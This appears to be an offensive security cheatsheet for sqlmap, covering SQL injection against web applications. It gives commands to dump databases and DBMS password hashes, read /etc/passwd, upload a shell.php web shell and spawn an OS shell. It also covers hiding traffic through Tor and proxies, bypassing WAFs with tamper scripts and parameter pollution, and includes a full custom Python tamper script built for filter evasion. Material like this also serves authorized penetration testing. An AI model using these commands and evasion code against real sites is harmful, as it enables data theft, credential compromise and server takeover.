SQLMap
A cheatsheet for SQLMap usage to automate SQL injection attacks, covering injection techniques, database enumeration, data extraction, OS exploitation, WAF bypass, and tamper script evasion against web applications.
Author: BobBuilder
HTTP Request Setup
GET Request
sqlmap -u "http://<domain>/?id=1"
POST Request
sqlmap -u "http://<domain>/" --data="id=1&name=test"
Raw HTTP Request
sqlmap -r <request_file>
Custom HTTP Method
sqlmap -u "http://<domain>/" --data="id=1" --method=PUT
Enumeration Arguments
Supported Techniques
--technique=BEUSTQ # B=Boolean-based blind, E=Error-based, U=UNION query, S=Stacked queries, T=Time-based blind, Q=Inline queries
Database Basic
--banner # DBMS banner
--current-user # Current DB user
--current-db # Current database
--is-dba # Check DBA privileges
--dbs # List databases
--tables -D <db> # List tables in a database
--columns -T <table> -D <db> # List columns in a table
--dump -T <table> -D <db> # Dump table data
--dump-all # Dump all data
--start=2 --stop=3 # Row range
--where="name LIKE 'admin%'" # Conditional dump
--exclude-sysdbs # Skip system DBs
--dump-format=html # Output format
Database Advanced
--schema # Full DB schema
--search -T <keyword> # Search table names
--search -C <keyword> # Search column names
--passwords # Dump DBMS user password hashes
--all # Full enumeration
--batch # Non-interactive mode
Full Auto Mode
sqlmap -u "http://<domain>/?id=1" --all --batch
Parameter Discovery
--crawl=3 # Crawl level
--forms # Detect HTML forms
-g "<google_dork>" # Use Google dork
Injection Tuning
--prefix="%'))" # Payload prefix
--suffix="-- -" # Payload suffix
--no-escape # Disable escaping
--no-cast # Disable data type casting
--union-cols=5 # Set UNION column count
--union-char='a' # Dummy filler char
--union-from=<table> # Force UNION FROM clause
--parse-errors # Show SQL errors
OS Exploitation
--is-dba # Confirm DBA privileges (file and OS options usually require them)
--file-read="/etc/passwd" # Read remote file (MySQL: needs FILE privilege, honours secure_file_priv)
--file-write="shell.php" # Local file to upload
--file-dest="/var/www/html/shell.php" # Destination on the DB server (writable by the DBMS process; differs from the web root if DB and web hosts are separate)
--os-shell # Spawn OS shell (web stager upload on MySQL/PostgreSQL, xp_cmdshell on MSSQL)
--technique=E # Restrict to a single technique (error-based here)
--batch # Non-interactive shell setup
WAF/Filter Evasion
--csrf-token="csrf" # Name of the anti-CSRF token parameter to fetch and re-send automatically
--randomize=<param> # Randomize the value of <param> on every request
--eval="import hashlib; ..." # Python code run before each request to compute dynamic values
--proxy="socks4://<ip>:<port>" # Route traffic through a SOCKS proxy
--tor # Use Tor
--check-tor # Validate that traffic actually exits via Tor
--skip-waf # Skip heuristic WAF/IPS detection
--random-agent # Use random User-Agent
UTF-16 (\uXXXX) Escape Helper (Manual)
# Convert input to \uXXXX escapes, one per UTF-16 code unit (characters outside the BMP become surrogate pairs)
units = input('> ').strip().encode('utf-16-be')
print(''.join(f"\\u{units[i:i + 2].hex()}" for i in range(0, len(units), 2)))
Tamper Scripts
Usage
--tamper=between,randomcase
--list-tampers
Common Scripts
Script | Description
---|---
between | Replaces > with NOT BETWEEN 0 AND, and = with BETWEEN ... AND ... (avoids filtered comparison operators)
base64encode | Base64-encodes the whole payload (only useful when the application decodes it)
randomcase | Randomizes the casing of each keyword character (SeLeCt)
space2comment | Replaces spaces with /**/
space2dash | Replaces spaces with -- followed by a random string and a newline (MSSQL, SQLite)
space2hash | Replaces spaces with # followed by a random string and a newline (MySQL)
modsecurityversioned | Wraps the whole payload in a MySQL versioned comment (/*!... */)
plus2concat | Replaces + with CONCAT() (MSSQL)
percentage | Prefixes each keyword character with % (%K%E%Y%W%O%R%D, ASP/IIS)
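When none of the bundled scripts fits, write your own. The block below is an added example, not one of sqlmap's tamper scripts: it follows the module contract sqlmap loads (a module-level __priority__, an optional dependencies() hook, and tamper(payload, **kwargs) returning the rewritten string) and combines two of the evasions in the table, space2comment-style /**/ substitution and MySQL versioned comments around keywords. It keeps string literals untouched, reuses space2comment's heuristic that quotes before the first space belong to the injection prefix, and preserves the space after -- so the trailing comment still parses. The keyword list, the 50000 version floor and the filename commentwrap.py are assumptions for the example.

```python
"""Custom sqlmap tamper script: comment-wrap spaces and keywords.

Added example (not a bundled sqlmap tamper). Layout follows the contract
sqlmap expects from a tamper module: a module-level __priority__, an
optional dependencies() hook, and tamper(payload, **kwargs) that returns
the rewritten payload string. Load it with --tamper=/path/to/commentwrap.py
(the filename is hypothetical).
"""
import re

try:
    from lib.core.enums import PRIORITY  # present only when sqlmap imports us
    __priority__ = PRIORITY.LOW
except ImportError:
    __priority__ = 0  # stand-alone (testing) fallback

# Keywords to hide in MySQL versioned comments; the list and the 50000
# version floor are assumptions chosen for this example.
KEYWORDS = ("SELECT", "UNION", "FROM", "WHERE", "ORDER", "BY", "LIMIT", "AND", "OR")
KEYWORD_RE = re.compile(r"\b(" + "|".join(KEYWORDS) + r")\b", re.IGNORECASE)
VERSION = "50000"


def dependencies():
    """Hook sqlmap calls once at start-up; bundled scripts print DBMS hints here."""
    pass


def _segments(payload):
    """Yield (chunk, is_literal) pairs so single-quoted literals stay untouched.

    Quotes seen before the first space are treated as the boundary that closes
    the application's own literal (the leading ' in  1' AND 'a'='a ), the same
    heuristic sqlmap's space2comment uses, so they do not flip the state.
    """
    buf, literal, seen_space = "", False, False
    for ch in payload:
        if ch == " ":
            seen_space = True
        if ch == "'" and seen_space:
            if literal:                 # closing quote ends the literal
                yield buf + ch, True
                buf = ""
            else:                       # opening quote starts one
                yield buf, False
                buf = ch
            literal = not literal
            continue
        buf += ch
    yield buf, literal


def _rewrite(chunk):
    """Apply both evasions to a chunk that is outside any string literal."""
    # Replace spaces with /**/, but keep the space after '--': MySQL only
    # treats '--' as a comment when whitespace follows it.
    chunk = re.sub(r"(?<!--) ", "/**/", chunk)
    # Wrap keywords in versioned comments: MySQL executes the text inside
    # /*!50000 ... */, while a naive regex filter may only see a comment.
    return KEYWORD_RE.sub(lambda m: "/*!%s%s*/" % (VERSION, m.group(1)), chunk)


def tamper(payload, **kwargs):
    """Entry point sqlmap calls for every generated payload."""
    if not payload:
        return payload
    return "".join(chunk if is_literal else _rewrite(chunk)
                   for chunk, is_literal in _segments(payload))


if __name__ == "__main__":
    for p in ("1 AND 1=1", "1' AND 'a'='a", "' UNION SELECT 'x'-- -"):
        print("%-28s -> %s" % (p, tamper(p)))
```

Run it directly to see the rewritten payloads, or pass it to sqlmap with --tamper=/path/to/commentwrap.py (chain it with other scripts by comma as shown under Usage). Versioned comments are MySQL-only; against another DBMS drop the keyword wrapping and keep the space substitution.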
Miscellaneous Bypasses
Chunked Transfer
--chunked
HTTP Parameter Pollution (Manual)
# Only works where the backend joins repeated parameters into one value (ASP/IIS concatenates them with commas)
sqlmap -u "http://<domain>/?id=1&id=UNION&id=SELECT&id=user&id=FROM&id=users"